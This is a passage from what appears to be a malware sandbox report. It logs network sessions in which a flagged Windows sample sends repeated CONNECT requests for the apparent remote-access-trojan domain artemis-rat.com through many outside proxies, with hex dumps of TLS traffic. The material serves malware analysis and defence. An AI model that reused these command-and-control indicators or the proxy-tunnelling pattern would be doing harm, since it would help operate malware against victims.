                                              Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%Qh
                                              Mar 11, 2024 08:37:18.480438948 CET498INData Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7
                                              Data Ascii: IZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( ]3str/JiA94lyK
                                              Mar 11, 2024 08:37:18.482456923 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 77 f8 0b 97 5d c6 a0 b0 64 97 23 ac e0 1c de b1 8b 66 fa a8 2c 2a b2 5a 20 bf 7f f2 74 a9 35 55 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 cb 3a 33 eb 71 6a d7 06 5d 15 b7 18 4e b1 2a 36 18 e6 0d 20 13
                                              Data Ascii: %! w]d#f,*Z t5U(:3qj]N*6 lBTi}4
                                              Mar 11, 2024 08:37:19.008424044 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 94 fc a7 d8 bf 6e 67 09 04 a5 d4 d5 28 96 45 a2 24 7d c5 c1 1d 12 ff d5 34 5d 33 f8 df e8 0a b9 83 35 ec 7e ec 9c c2 36 ec be c5 ad 30 d3 7b 26 49 1a 6b 65 a5 06 32 a9 77 41 a8 c8 2f 1e 9c 27 63 89 b0
                                              Data Ascii: ng(E$}4]35~60{&Ike2wA/'cP.?oH9+F/T&y-l95(pA,9w:*9E:warc1:(io7mpy
                                              Mar 11, 2024 08:37:19.075141907 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 bb 1d e6 43 05 ff 89 e5 9c 7d 87 8c a4 3a 63 5a 8a d7 03 90 96 23 38 d5 74 c7 b5 ed 96 54 54 c3 5f 7d e8 7e 16 5d 19 49 ff 23 f9 81 62 6c f5 fe eb 76 6a d1 b9 88 fa 93 be 03 6e b3 02 e7 06 98 ac 34 58 90 18
                                              Data Ascii: C}:cZ#8tTT_}~]I#blvjn4XqH|caQI%9XX&}p<H.EK(?Ftf1h H#?|%B%"itNpf5i&27YV"2EAIE:qlA<DV\G=
                                              Mar 11, 2024 08:37:19.599458933 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 05 57 4e b4 ae bd 27 d3 ba bf 13 4c a1 16 34 47 c8 f1 de 99 ba 7d 45 9a 7d 68 8b 2e 26 28 26 20 80 f1 07 2d f9 01 d0 fa c7 1c 58 cd 3c b9 6a 73 3f bb e3 72 68 08 f4 3d 33 db b2 84 7d 0b 3d b7 cd 7b 02 34 32
                                              Data Ascii: qWN'L4G}E}h.&(& -X<js?rh=3}={42>|@JA0]r5'U'Qoq0C *Uh ~"U)C#t%{s"205ly'7H@E RqxU[;=K_&F1##/fa


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.449813203.74.125.1888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.956383944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.408926010 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.449817203.222.24.36807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.968265057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.265511036 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.449832163.172.137.49163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:16.993222952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.631778955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.389034986 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.449875198.37.57.112807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.012484074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.240778923 CET503INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Connection: close
                                              Content-Length: 324
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.44982080.92.227.18556787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.018007994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.44984347.242.234.237807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.023327112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.449920185.238.228.96807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.025351048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.179699898 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.44984058.234.116.197807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.027849913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.449896159.223.166.2151997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.039494991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.584891081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.256805897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.584924936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.257814884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069835901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757355928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.44991038.162.18.18131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.051701069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.467786074 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.449941188.114.99.171807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.069746971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.223886967 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.44991991.134.140.16088797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.070164919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.449944104.19.225.70807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.070806980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.225136995 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.44986918.185.169.15031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.074814081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.379887104 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.449873221.153.92.39807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.083189964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.382297993 CET310INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 150
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.449887147.75.92.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.084180117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.366894960 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3
                                              Mar 11, 2024 08:37:17.416560888 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 ac c8 83 74 4e 74 4a e7 79 fe 7e fe 6a 8e 5d 67 21 39 94 a0 a3 d6 39 1e eb 42 3e 4e 76 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: etNtJy~j]g!99B>Nv*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:17.708230972 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee b4 ad 53 53 46 ee 51 7c 08 a1 d2 84 dc ec 39 f0 2b 65 f4 77 f5 50 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                              Data Ascii: C?eSSFQ|9+ewPDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                              Mar 11, 2024 08:37:17.708400965 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                              Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                              Mar 11, 2024 08:37:17.708513975 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                              Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                              Mar 11, 2024 08:37:17.990689039 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                              Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
